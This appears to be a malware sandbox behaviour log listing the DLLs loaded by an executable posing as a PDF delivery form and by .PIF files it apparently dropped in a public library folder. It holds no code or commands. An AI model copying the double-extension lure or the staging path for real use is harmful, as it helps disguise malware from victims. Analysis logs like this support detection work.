Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppcext.dll	Jump to behavior
